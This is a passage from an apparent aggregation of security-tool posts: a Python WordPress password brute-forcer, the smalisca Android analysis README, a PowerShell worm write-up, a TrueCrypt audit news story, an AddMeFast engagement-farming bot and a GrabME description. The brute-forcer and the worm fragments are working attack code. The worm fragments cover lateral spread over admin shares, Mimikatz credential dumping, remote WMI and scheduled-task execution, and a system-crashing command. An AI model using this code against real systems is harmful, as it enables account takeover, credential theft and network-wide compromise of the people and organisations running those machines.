    if str(response.status)[0] == "4" or str(response.status)[0] == "5":

    print('[X] HTTP error, code: '+str(response.status))

    os._exit(1)

    # Remove all blank and newline chars

    xmlcontent = content.replace(" ", "").replace("\n","")

    if not "403" in xmlcontent:

    print('\n')

    print('[!] Password FOUND!!!')

    print('')

    print('[!] Username: '+user+' Password: '+password)

    os._exit(0)

    checkCon = "OK"

    return checkCon

    except socket.timeout:

    print('[X] Connection Timeout')

    os._exit(1)

    except socket.error:

    print('[X] Connection Refused')

    os._exit(1)

    except httplib.ResponseNotReady:

    print('[X] Server Not Responding')

    os._exit(1)

    except httplib2.ServerNotFoundError:

    print('[X] Server Not Found')

    os._exit(1)

    except httplib2.HttpLib2Error:

    print('[X] Connection Error!!')

    os._exit(1)

    commandList = argparse.ArgumentParser(sys.argv[0])

    commandList.add_argument('-S', '--standard',

    action="store_true",

    dest="standard",

    help="Standard login brute",

    )

    commandList.add_argument('-X', '--xml-rpc',

    action="store_true",

    dest="xml",

    help="Xml-rpc login brute",

    )

    commandList.add_argument('-t', '--target',

    action="store",

    dest="target",

    help="Insert URL: http://www.victimurl.com[:port]",

    )

    commandList.add_argument('-u', '--username',

    action="store",

    dest="username",

    help="Insert username",

    )

    commandList.add_argument('-w', '--wordfilelist',

    action="store",

    dest="wordfilelist",

    help="Insert wordlist file",

    )

    commandList.add_argument('--timeout',

    action="store",

    dest="timeout",

    default=10,

    type=int,

    help="Timeout Value (Default 10s)",

    )

    options = commandList.parse_args()

    # Check bruteforce mode conflicts

    if options.standard and options.xml:

    print "\n[X] Select standard [-S] OR xml-rpc [-X] bruteforce mode"

    sys.exit(1)

    # Check args

    if not options.standard and not options.xml:

    print(banner)

    print

    commandList.print_help()

    sys.exit(1)

    elif not options.target or not options.username or not options.wordfilelist:

    print(banner)

    print

    commandList.print_help()

    sys.exit(1)

    # Set bruteforce mode

    if options.standard:

    brtmd="std"

    else:

    brtmd="xml"

    # args to vars

    url = options.target

    user = options.username

    password = options.wordfilelist

    timeout = options.timeout

    # Check if Wordlist file exists and has readable

    if not os.path.isfile(password) and not os.access(password, os.R_OK):

    print "[X] Wordlist file is missing or is not readable"

    sys.exit(1)

    # Open and read Wordlist file

    wordlist = open(password).read().split("\n")

    # Remove last empty values from wordlist list

    del wordlist[-1]

    # Total lines (password) in Wordlist file

    totalwordlist = len(wordlist)

    # Gen Random UserAgent

    UA = randomAgentGen()

    # Url to url+login_cms_page

    url = urlCMS(url,brtmd)

    print(banner)

    print

    print('[+] Target.....: '+options.target)

    print('[+] Wordlist...: '+str(totalwordlist))

    print('[+] Username...: '+user)

    if brtmd == "std":

    print('[+] BruteMode..: Standard')

    else:

    print('[+] BruteMode..: Xml-Rpc')

    print('[+]')

    print('[+] Connecting.......')

    print('[+]')

    # Check connection with fake-login

    if connection(url,user,UA,UA,timeout,brtmd) == "OK":

    print('[+] Connection established')

    # Reset var for "progress bar"

    count = 0

    threads = []

    for pwd in wordlist:

    count += 1

    t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd))

    t.start()

    threads.append(t)

    sys.stdout.write('\r')

    sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))

    sys.stdout.flush()

    sleep(0.210)

    for a in threads:

    a.join()

    # no passwords found

    print('\n[X] Password NOT found :(')

    WordPress Brute Forcer 2.0 ? Packet Storm

  10. README.rst

    =========================================
    Static Code Analysis for Smali
    =========================================

    If you have ever looked at Android applications, you know how to appreciate
    the ability to analyze your target at the most advanced level. Dynamic
    program analysis will give you a pretty good overview of your application's
    activities and general behaviour. However, sometimes you'll want to just
    analyze your application **without** running it. You'll want to have a look
    at its components, analyze how they interact and how data is tainted
    from one point to another.

    This was the major factor driving the development of *smalisca*. There
    are indeed some good reasons for a *static code analysis* before the
    *dynamic* one. Before interacting with the application I like to know
    how the application has been built, whether there is any API, and to generate all
    sorts of *call flow graphs*. In fact graphs have been very important to
    me since they *visualize* things. Instead of jumping from file to file,
    from class to class, I just look at the graphs.

    While graph building has been an important reason for me to code such a
    tool, *smalisca* has some other neat **features** you should read about.


    Features
    ========

    At the moment there are a few major functionalities like:

    * **parsing**

    You can parse a whole directory of **Smali** files and **extract**:

    * class information
    * class properties
    * class methods
    * calls between methods of different classes

    You can then **export** the results as **JSON** or **SQLite**.

    Have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for more information.



    * **analyzing**

    After exporting the results you'll get an **interactive prompt** to take
    a closer look at your parsed data. You can **search** for classes, properties,
    methods and even method calls. You can then apply several **filters** to your search
    criteria like::

    smalisca> sc -c class_name -p test -r 10 -x path -s class_type

    This command will search for *10* (-r 10) classes which contain the pattern *test* (-p)
    in their *class name* (-c). Afterwards the command will exclude the column *path*
    (-x path) from the results and sort them by the *class type* (-s).

    Let's have a look at another example::

    smalisca> scl -fc com/android -fm init -r 10

    This will search for all **method calls** whose *calling* class name contains the pattern
    *com/android* (-fc). Additionally we can look for calls originating from methods whose
    names contain the pattern *init* (-fm).

    You can of course read your commands from a file and analyze your results in a *batch*-
    like manner::

    $ cat cmd.txt
    sc -c class_name -p com/gmail/xlibs -r 10 -x path
    quit
    $ ./smalisca.py analyzer -i results.sqlite -f sqlite -c cmd.txt
    ...

    Have a look at the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more information.



    * **visualizing**

    I think this is the **most** valuable feature of *smalisca*. The ability to visualize your
    results in a structured way makes your life more comfortable. Depending on what you're
    interested in, this tool has several graph drawing features I'd like to promote.

    At first you can draw your packages including their classes, properties and methods::

    smalisca> dc -c class_name -p test -f dot -o /tmp/classes.dot
    :: INFO Wrote results to /tmp/classes.dot
    smalisca>

    This will first search classes whose class name contains *test* and then export the
    results in the **Graphviz DOT** language. You can then manually generate a graph using
    *dot*, *neato*, *circo* etc. Or you do that using the interactive prompt::

    smalisca> dc -c class_name -p test -f pdf -o /tmp/classes.pdf --prog neato
    :: INFO Wrote results to /tmp/classes.pdf
    smalisca>

    Have a look at the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for more information.

    Screenshots
    ===========

    .. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_search_classes.png
    :scale: 99%
    :alt: Basic usage

    Output results as table.



    .. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_dxcl_dot_0.png
    :scale: 99%
    :alt: Cross calls

    Basic relationships between classes and modules.


    Have a look at the `screenshots page <http://smalisca.readthedocs.org/en/latest/screenshots.html>`_.


    Installation
    ============

    Refer to the `installation page <http://smalisca.readthedocs.org/en/latest/installation.html>`_.
    Requirements:

    * Python (2.x / 3.x)
    * `cement <http://builtoncement.com/>`_
    * Graphviz
    * SQLAlchemy


    How to use it
    =============

    After installing the tool, you may want to first pick up an Android application (APK)
    to play with. Use `apktool <https://code.google.com/p/android-apktool/>`_ or my own tool
    `ADUS <https://github.com/dorneanu/adus>`_ to dump the APK's content. For the sake of
    simplicity I'll be using **FakeBanker** which I've analyzed in a previous
    `blog post <http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/>`_.

    First touch
    -----------

    But first let's have a look at the tool's main options::

    $ smalisca --help
    ___
    /\_ \ __
    ____ ___ ___ __ \//\ \ /\_\ ____ ___ __
    /',__\ /' __` __`\ /'__`\ \ \ \ \/\ \ /',__\ /'___\ /'__`\
    /\__, `\/\ \/\ \/\ \/\ \L\.\_ \_\ \_\ \ \/\__, `\/\ \__//\ \L\.\_
    \/\____/\ \_\ \_\ \_\ \__/.\_\/\____\\ \_\/\____/\ \____\ \__/.\_\
    \/___/ \/_/\/_/\/_/\/__/\/_/\/____/ \/_/\/___/ \/____/\/__/\/_/



    --------------------------------------------------------------------------------
    :: Author: Victor <Cyneox> Dorneanu
    :: Desc: Static Code Analysis tool for Smali files
    :: URL: http://nullsecurity.net, http://{blog,www}.dornea.nu
    :: Version: 1.0
    --------------------------------------------------------------------------------

    usage: smalisca.py (sub-commands ...) [options ...] {arguments ...}

    [--] Static Code Analysis (SCA) tool for Baskmali (Smali) files.

    commands:

    analyzer
    [--] Analyze results using an interactive prompt or on the command line.

    parser
    [--] Parse files and extract data based on Smali syntax.

    optional arguments:
    -h, --help show this help message and exit
    --debug toggle debug output
    --quiet suppress all output
    --log-level {debug,info,warn,error,critical}
    Change logging level (Default: info)
    -v, --version show program's version number and exit




    Parsing
    -------

    I'll first **parse** some directory for **Smali** files before doing the analysis stuff::

    $ smalisca parser -l ~/tmp/FakeBanker2/dumped/smali -s java -f sqlite -o fakebanker.sqlite

    ...

    :: INFO Parsing .java files in /home/victor/tmp/FakeBanker2/dumped/smali ...
    :: INFO Finished parsing!
    :: INFO Exporting results to SQLite
    :: INFO Extract classes ...
    :: INFO Extract class properties ...
    :: INFO Extract class methods ...
    :: INFO Extract calls ...
    :: INFO Commit changes to SQLite DB
    :: INFO Wrote results to fakebanker.sqlite
    :: INFO Finished scanning

    Also have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for further information.


    Analyzing
    ----------

    Now you're free to do whatever you want with your generated exports. You can inspect the **SQLite DB**
    directly or use *smalisca*'s **analysis** features::

    $ smalisca analyzer -f sqlite -i fakebanker.sqlite

    ...


    smalisca>sc -x path -r 10
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
    | id | class_name | class_type | class_package | depth |
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
    | 1 | Landroid/support/v4/net/ConnectivityManagerCompat | public | Landroid.support.v4.net | 5 |
    | 2 | Landroid/support/v4/view/AccessibilityDelegateCompat$AccessibilityDelegateJellyBeanImpl | | Landroid.support.v4.view | 5 |
    | 3 | Landroid/support/v4/view/ViewCompat$ViewCompatImpl | interface abstract | Landroid.support.v4.view | 5 |
    | 4 | Landroid/support/v4/app/ActivityCompatHoneycomb | | Landroid.support.v4.app | 5 |
    | 5 | Landroid/support/v4/app/NoSaveStateFrameLayout | | Landroid.support.v4.app | 5 |
    | 6 | Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2 | | Landroid.support.v4.net | 5 |
    | 7 | Lcom/gmail/xpack/BuildConfig | public final | Lcom.gmail.xpack | 4 |
    | 8 | Landroid/support/v4/app/BackStackRecord$Op | final | Landroid.support.v4.app | 5 |
    | 9 | Landroid/support/v4/app/FragmentManagerImpl | final | Landroid.support.v4.app | 5 |
    | 10 | Landroid/support/v4/app/ShareCompat$ShareCompatImpl | interface abstract | Landroid.support.v4.app | 5 |
    +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+

    Also refer to the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more available **commands** and options.


    Drawing
    -------

    Please refer to the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for full examples.


    License
    ========

    *smalisca* has been released under the **MIT** license. Have a look at the **LICENSE.rst** file.

    Credits
    =======

    This tool is dedicated to **Lic?**. Many thanks also go to:

    * `Stephen McAllister <https://de.linkedin.com/pub/stephen-mcallister/13/843/71a>`_

    * Many thanks for all those hours full of APK debugging and great ideas

    * My gf

    * Thank you very much for your patience and understanding!

    * `nullsecurity.net <http://nullsecurity.net>`_

    * Hack the planet!

    Download:

    smalisca-0.1.tar.gz

    Description: Static Code Analysis tool for Smali files.

    MD5: 943930dbd144c52635f3d5b874482d3a

    Author: Cyneox

  11. TL;DR: Another Powershell Worm here.

    Recently, I was approached with a few ideas about worms, in order to test whether such worms could be detected or stopped. This, together with some interesting posts I had read about PowerShell-based worms, pushed me to attempt to build a worm with a slightly different take.

    One of the requirements for this worm is that it propagate without knowing whether an external connection to the internet exists. This matters if the worm is to jump across an air-gapped network somehow, or if the command and control is severed. Also, attempting to dump creds and setting up some sort of persistence would be a plus. Lastly, the whole thing (or as much of it as possible) should be written in PowerShell, so that the option of base64-encoding it and running it in memory is available.

    Target enumeration

    This is a pick your own adventure technique. First, the worm will need to identify potential targets to spread to. The worm uses 3 techniques (others may exist) to enumerate targets:


    1. Dump domain hosts
    2. grab local class C
    3. grab IPs from netstat

    As annotated in an earlier post, we can cycle domain hosts pretty easily if we are logged into a domain via:

    # Enumerates the computer accounts of the domain this host is joined to.
    # A DirectoryEntry/DirectorySearcher pair is created (no path given, so it
    # presumably binds to the current domain's default naming context), the
    # search is filtered on (objectCategory=computer), the "name" and "cn"
    # attributes are loaded, and every result's "name" is returned in an array.
    # As the author notes, this fails on a host that is not domain-joined.
    # Defender note: a workstation issuing an LDAP search for every computer
    # object is a recognisable reconnaissance pattern; LDAP query logging on the
    # domain controllers is where it surfaces.
    function getDomain {
    $final = @()
    #get Domain computers
    $strCategory = "computer"
    $objDomain = New-Object System.DirectoryServices.DirectoryEntry
    $objSearcher = New-Object System.DirectoryServices.DirectorySearcher
    $objSearcher.SearchRoot = $objDomain
    # Only the "computer" object category is requested.
    $objSearcher.Filter = ("(objectCategory=$strCategory)")
    $colProplist = "name", "cn"
    foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
    $colResults = $objSearcher.FindAll()
    foreach ($objResult in $colResults)
    {
    $objComputer = $objResult.Properties
    # Only the "name" attribute is kept; "cn" is loaded but unused here.
    $bleh = $objComputer.name
    $final += $bleh
    }
    return $final
    }

    But what if the victim host isn’t a part of a domain? This will fail, so error handling will be useful here (see final version at the top of the page). The next attempt to enumerate hosts is a class c brute force. To set this up, the worm needs to know the current IP address of the machine we are on, a la:

    # Collects this host's own IPv4 addresses through WMI: only IP-enabled
    # adapters are considered, each address is cast to [IPAddress] and kept when
    # its AddressFamily is InterNetwork (IPv4), then rendered back to a
    # dotted-decimal string. The result feeds the /24 sweep below.
    $enum = Get-WMIObject win32_NetworkAdapterConfiguration | 
    Where-Object { $_.IPEnabled -eq $true } |
    Foreach-Object { $_.IPAddress } |
    Foreach-Object { [IPAddress]$_ } |
    Where-Object { $_.AddressFamily -eq 'Internetwork' } |
    Foreach-Object { $_.IPAddressToString }

    Then, the worm parses the first 3 octets and runs through a for loop (assumes /24 at the moment):

    # Builds the list of host strings for the worm's /24 ("class C") sweep:
    # the first three dotted octets of $ip are joined back together and the
    # loop counter 1..254 is appended to that prefix for each entry.
    # Defender note: one host touching every address of its own /24 in quick
    # succession is readily visible in NetFlow or host-firewall logs.
    function getClassC{
    Param($ip);
    $final = @()
    # First three octets of the current address, re-joined with dots.
    $classC = $ip.Split(".")[0]+"."+$ip.Split(".")[1]+"."+$ip.Split(".")[2]
    # -lt 255 bounds the sweep to the counter values 1..254.
    for($i=1; $i -lt 255; $i++)
    {
    $final += $classC + $i.ToString()
    }
    return $final
    }

    Lastly, the worm will try a netstat “hail mary”:

    #//netstat mode
    # Harvests candidate peers from this host's own connection table: runs
    # netstat -ano, splits every output line on spaces, takes the part before
    # the first ":" of each token, and keeps tokens that are 8..21 characters
    # long, contain a ".", and are not 0.0.0.0, 127.0.0.1 or this host's $ip.
    # $ip and $final are defined by the surrounding script, not this fragment.
    # Defender note: netstat.exe spawned as a child of a PowerShell host is a
    # common reconnaissance indicator in process-creation telemetry.
    $n = netstat -ano

    foreach ($n2 in $n)
    {
    $n4= $n2.Split(" ")
    foreach ($n3 in $n4)
    {
    # Drop any ":port" suffix.
    $n5 = $n3.Split(":")[0]
    if (($n5.Length -gt 7) -and ($n5.Length -lt 22))
    {
    if (!( ($n5 -eq "0.0.0.0") -or ($n5 -eq $ip) -or ($n5 -eq "127.0.0.1") ) )
    {
    if ($n5.Contains("."))
    {
    Write-Host $n5
    $final += $n5
    }
    }

    }
    }
    }

    Spreading technique

    In the testing environment we were able to spread using various techniques, but for simplicity we will discuss PsDrive (additional techniques may be used). The credentials the worm runs under (or the lack of them) will dictate what is available.

    PsDrive can set up a powershell accessible share much like net share, except that this share is only viewable in powershell!

    ps-drive11.png

    Screenshot of successfully created PS-Drive that does not show up under net use.

    Here, the worm sets up the PsDrive to copy files over and moves the files to the destination (via C$ in our example, but other shares may exist):

    # Builds a UNC path to the target's copy of the current user's Downloads
    # folder under the C$ administrative share and maps it as drive Y:.
    # $nethost (the target) is set by the surrounding loop; $profile is reused
    # afterwards as the local source directory for Copy-Item.
    # Defender note: mapping an admin share from another workstation produces a
    # network logon and a share-access audit record on the target.
    $prof = "USERPROFILE"
    $profile = (get-item env:$prof).Value +"\Downloads"
    # Drop the first three characters (drive letter, colon, backslash) so the
    # remainder can be appended under \\<host>\C$\.
    $pro1 = $profile.SubString(3, $profile.Length-3)
    $psdrive = "\\"+$nethost+"\C$\"+ $pro1
    New-PsDrive -Name Y -PsProvider filesystem -Root $psdrive

    Next, the worm (and any additional scripts) are copied over:

    # Stages the payload set on the mapped Y: drive: the worm script itself, a
    # MOF file, the PowerSploit Invoke-Mimikatz script and a UAC-bypass binary.
    # $profile (source) and Y: (target) come from the preceding fragment.
    # Defender note: new .ps1/.mof/.exe files appearing in a user's Downloads
    # folder via SMB from another workstation is an easy file-audit signal.
    Copy-Item $profile\PowerW0rm.ps1 Y:\PowerW0rm.ps1
    Copy-Item $profile\PowerW0rm.mof Y:\PowerW0rm.mof
    Copy-Item $profile\Invoke-Mimikatz.ps1 Y:\Invoke-Mimikatz.ps1
    Copy-Item $profile\bypassuac-x64.exe Y:\bypassuac-x64.exe

    Finally, since this code is running in a loop, the worm removes the PsDrive:

    # Tear the temporary Y: mapping down again so the next loop iteration can
    # map it for the next target.
    Remove-PsDrive Y

    Code Execution

    In a Windows 7/Server 2008 R2 environment, Remote PowerShell isn't enabled by default. However, other options exist depending on access level and GPO settings. The worm uses two methods of code execution: schtasks and Invoke-WMIMethod (others exist, such as Invoke-Command). Some examples can be found below:

    # Example remote-execution primitives used by the worm. $profile, $nethost
    # and $cred are set elsewhere in the script. The second command string is
    # the author's destructive "logic bomb" variant, not the worm launcher.
    # Defender note: a Win32_Process.Create arriving over WMI shows up on the
    # target as a process parented by WmiPrvSE.exe, and schtasks /CREATE with
    # /S against a remote host leaves a scheduled-task-creation record
    # (Security event 4698) on that host; both are routinely alerted on.
    $run = "powershell -exec Bypass "+$profile+"\\PowerWorm.ps1"
    $task = $profile+"\\bypassuac-x64.exe /C powershell.exe -exec Stop-Process csrss" # BSOD for a logic bomb

    #run with dump creds
    Invoke-WMIMethod -Class Win32_Process -Name Create -Authentication PacketPrivacy -Computername $nethost -Credential $cred
    -Impersonation Impersonate -ArgumentList $run
    #run as current user
    Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList $run
    #schtask example
    schtasks /CREATE /S $nethost /SC Daily /MO 1 /ST 00:01 /TN "update54" /TR $task /F #scheduled for the 1st of the year @ 00:01 AM
    schtasks /RUN /TN "update54" #Runs task immediately (kills worm, but just PoC)
    schtasks /DEL /TN "update54" #would never run in this context, but is an example

    Credential Harvesting

    The worm uses a call to Invoke-Mimikatz.ps1 from the PowerSploit project to dump and parse creds as it jumps from machine to machine. This is achieved with a slight modification to the very end of Invoke-Mimikatz.ps1:

    # The two lines the author appends to the end of Invoke-Mimikatz.ps1 so
    # that simply running the file dumps credentials and prints them to the
    # console, where the worm's runCMD wrapper collects the output.
    $creds = Invoke-Mimikatz -dumpcreds
    Write-Host $creds

    The worm first calls Invoke-Mimikatz:

    #try to grab creds
    # Builds a command line that starts a second powershell.exe with the
    # execution policy bypassed, pointing at Invoke-Mimikatz.ps1 in the same
    # directory as the running script; runCMD (defined outside this fragment)
    # executes it and returns its output as $creds_str.
    # Defender note: powershell.exe spawning powershell.exe with "-exec Bypass"
    # and a Mimikatz script path on the command line is a high-signal
    # process-creation event.
    $scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
    $scriptPath = $scriptPath + "\Invoke-Mimikatz.ps1 -dumpcreds"
    $creds = "powershell.exe -exec Bypass " + $scriptPath
    $creds_str = runCMD $creds

    Followed by some nifty regex to extract just username and password from output:

    # Multiline regex matching the three consecutive "* Username", "* Domain",
    # "* Password" lines of the Mimikatz output. The here-string body is part
    # of the pattern, so its lines are left exactly as posted.
    $creds_regex= @"
    .*\*\sUsername.*
    .*\*\sDomain.*
    .*\*\sPassword.*
    "@

    # Rewrites every space as CRLF so each token lands on its own line.
    # NOTE(review): as posted this reads $creds, which the earlier fragment set
    # to the command line, rather than the runCMD output in $creds_str —
    # presumably the full script differs here.
    $creds_str = $creds -replace " ", "`r`n"

    # Initialised but not used within this fragment.
    $cred_store = @{}

    # Multiline so ^/$ (and the leading .*) work per line of the output.
    $found = new-object System.Text.RegularExpressions.Regex($creds_regex, [System.Text.RegularExpressions.Regexoptions]::Multiline)
    $m=$found.Matches($creds_str)

    And finally, some last minute parsing which trims the strings to exactly what is needed:

    # Reduces one three-line regex match to its three values: the text is split
    # on CR/LF (a CRLF pair therefore yields an empty element between lines,
    # which is why only the even indices 0, 2 and 4 are read), each of those
    # lines is split on ":" and the segment after the first ":" is kept.
    # Returns an array of the three extracted strings.
    function parsed()
    {
    Param([string]$str1)
    $p1 = $str1 -split '[\r\n]'
    $parse=@()

    for ($j=0; $j -lt 3; $j++)
    {
    # Skip the empty elements produced by splitting on both \r and \n.
    $num = $j*2
    $p2 = $p1[$num].split(":")
    #Write-Host $j "," $num "," $p2
    $p3 = $p2[1]

    # The leading comma keeps the element from being flattened into $parse.
    $parse+= , $p3
    }
    return $parse
    }

    Additional thoughts

    At the top of the post, as well as here, is a link to the complete PoC PowerWorm.ps1. It works well on Vista/7, but there seem to be a few bugs when trying to run it against XP/8 (due to an error with Invoke-Mimikatz). I used something very similar after gaining domain admin credentials, then began moving laterally in an environment where psexec/winrm/pass-the-hash tricks did not seem to work. I did have some issues (duh) with this worm hammering the DC, because there is no check in place to see whether the worm had already run on a host, and the DC is the first host in the domain hosts array! The fix for this issue is left as an exercise for the reader. Also, this script could easily be modified to roll out other files/scripts/binaries across a domain automatically — which I also did, trying to push traffic-generation scripts for testing at a later date, but that story is for another post.

    Source: https://khr0x40sh.wordpress.com/2014/11/13/powershell-worm/

  12. truecrypt-security-audit-services.png

    The Security audit of TrueCrypt disk-encryption software has been completed, with no evidence of any critical design vulnerabilities or deliberate backdoors in its code.

    TrueCrypt -- one of the world's most-used open source file encryption programs, used by millions of privacy and security enthusiasts -- has been audited over the past two years by a team of security researchers to assess whether it could be easily exploited and cracked. It has now cleared the second phase of the audit.

    TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition.

    NO NSA BACKDOORS

    Security auditors and cryptography experts at NCC took the initiative to perform a public information security audit of TrueCrypt in response to concerns that the National Security Agency (NSA) may have tampered with it, as suggested by a classified document leaked by Edward Snowden.

    "TrueCrypt appears to be a relatively well-designed piece of crypto software," cryptographic expert Matthew Green wrote in a blog post on Thursday. "The NCC audit found no evidence of deliberate backdoors, or any severe design flaws that will make the software insecure in most instances."

    TrueCrypt cleared the first phase of the audit, which reviewed the blueprints of the software, and was given a relatively clean bill of health almost a year ago. In that first phase, auditors discovered 11 issues of medium and low severity in the software.

    Now, the auditors from NCC Group’s Cryptography and security audit Services have finalized and published the 21-page Open Cryptographic report related to the second phase of audit that examined TrueCrypt's implementation of random number generators and critical key algorithms, and various encryption cipher suites.

    FOUR VULNERABILITIES DISCOVERED

    The report uncovered four vulnerabilities in the latest original version of the software, but none of them could lead to a bypass of confidentiality or let hackers use deformed inputs to subvert TrueCrypt. The vulnerabilities are given below:

    • Keyfile mixing is not cryptographically sound -- Low severity
    • Unauthenticated ciphertext in volume headers -- Undetermined
    • CryptAcquireContext may silently fail in unusual scenarios -- High severity
    • AES implementation susceptible to cache timing attacks -- High severity

    The most critical of the four vulnerabilities involved the use of the Windows API to generate the random numbers used for the master cryptographic key.

    A separate vulnerability of undetermined severity concerned the volume header decryption checks, which were susceptible to tampering. Also, a low-severity flaw: the method used to mix the entropy of keyfiles was not cryptographically sound.

    Another high severity flaw identified refers to "several included AES implementations that may be vulnerable to cache-timing attacks."

    Source: thehackernews.com

  13. AddMeFast-Bot

    Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service

    Update: not working anymore, 01-10-2015

    import mechanize

    import re

    from time import sleep

    import threading

    #cut something in many parts

    def chunkIt(seq, num):
        """Split ``seq`` into ``num`` consecutive slices of roughly equal size.

        The slice boundaries are computed with a floating-point step
        (``len(seq) / float(num)``) that is accumulated and truncated, so the
        pieces may differ in length by one. ``num`` must be non-zero
        (``ZeroDivisionError`` otherwise); an empty ``seq`` yields ``[]``.
        """
        total = len(seq)
        step = total / float(num)

        def _slices():
            # Accumulate the float cursor exactly as the boundaries are
            # consumed, so truncation happens on the running sum.
            cursor = 0.0
            while cursor < total:
                yield seq[int(cursor):int(cursor + step)]
                cursor += step

        return list(_slices())

    #generates a browser

    def genbrowser():
        """Return a mechanize.Browser that ignores robots.txt, follows
        redirects and presents a fixed (old Firefox 3.6) User-Agent string."""
        br = mechanize.Browser()
        # robots.txt is deliberately ignored for this site.
        br.set_handle_robots(False)
        br.set_handle_redirect(True)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')]
        return br

    class AMB(threading.Thread):
        """One worker thread: logs in to addmefast.com once with its own
        browser, then walks its assigned page range and fires the site's
        "checkFollowed"/"updateAction" AJAX calls for the entries it finds."""

        # define environment variable
        def __init__(self, rangex, user, passw):
            # Each thread owns a separate browser (and cookie jar).
            self.br1 = genbrowser()
            # Login happens before the Thread base class is initialised.
            self.alogin(self.br1, user, passw)
            self.range = rangex
            threading.Thread.__init__(self)
            # Per-request timeout (seconds) passed to every br.open() in run().
            self.timeout_value = 30

        # log the user in
        def alogin(self, br, user, passw):
            # Credentials are POSTed over plain HTTP (no TLS). Only the '@' in
            # the e-mail is hand-encoded as %40; the password is not
            # URL-encoded at all, so passwords containing '&' or '%' break.
            br.open('http://addmefast.com', \
                'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw))
            # Success is detected by string-matching the response body only.
            if 'Welcome' in br.response().read():
                print "Login successful on add me fast"

        #main function
        def run(self):
            sleep(1)
            for i in self.range:
                try:
                    #goes to a page with many links to like
                    #self.br1.open(
                    #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"}
                    self.br1.open(
                        'http://addmefast.com/includes/ajax.php', 'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),timeout=self.timeout_value)
                    #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365
                    page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read())
                    #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212");
                    number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read())
                    # NOTE(review): this counter shadows the page number `i` of
                    # the outer loop, and the body below always reads index
                    # [0]/[1] of the findall results (each a (group1, group2)
                    # tuple) instead of the i-th entry, so every pass repeats
                    # the same first two matches.
                    i = 0
                    while i < len(page_and_Lid):
                        page = page_and_Lid[0]
                        Lid = page_and_Lid[1]
                        number = number_and_token[0]
                        token = number_and_token[1]
                        #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"}
                        self.br1.open('http://addmefast.com/includes/ajax.php','act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page),timeout=self.timeout_value)
                        #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"}
                        self.br1.open('http://addmefast.com/includes/ajax.php','act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),timeout=self.timeout_value)
                        print "New shit made"
                        i+=1
                # Any failure for this page is printed and the next page is tried.
                except Exception, e:
                    print e

    if __name__=='__main__':
        # NOTE(review): under Python 2, input() evaluates the typed text as a
        # Python expression; raw_input() plus int() would be the safe way to
        # read a thread count.
        nbthreads = input('Number of threads: ')
        # number.txt holds the highest page number to visit; the page range is
        # split into one chunk per thread.
        z = chunkIt(range(1,int(open("number.txt").read())+1), nbthreads)
        # account.txt holds "email:password" (split on the first ':' only).
        user, passw = open('account.txt').read().split(':', 1)
        # Runs forever: one AMB thread per chunk, wait for all of them to
        # finish, then start the whole sweep again.
        while 1:
            for i in z:
                try:
                    AMB(i, user, passw).start()
                # Bare except: a failed login or network error for this chunk
                # is silently dropped.
                except:
                    pass
            # The main thread itself counts, hence > 1.
            while threading.activeCount() > 1:
                sleep(1)

    Source

  14. GrabME

    Sensitive information extraction tool.

    Report a bug:

    https://github.com/GuerrillaWarfare/GrabME/issues

    Up-to-date Usage examples:

    https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples

    GrabME - Extract Sensitive information from a file.

    Usage: ./grabme.py [FILE]

    What can it extract ?:

    Links
    hash values
    email addresses
    ipv4, ipv6 addresses
    bitcoin wallet addresses
    MAC addresses with : or - (delimiters)
    USA Based Telephone, Social Security and Major Credit Card numbers.

    Guerrilla Warfare Free License ("GWFL") v1.0


    1. You're free to modify this software to YOUR liking or leave it as is.

    2. This software comes as is, and may or may not receive any additional updates, Contact the developer for more help.

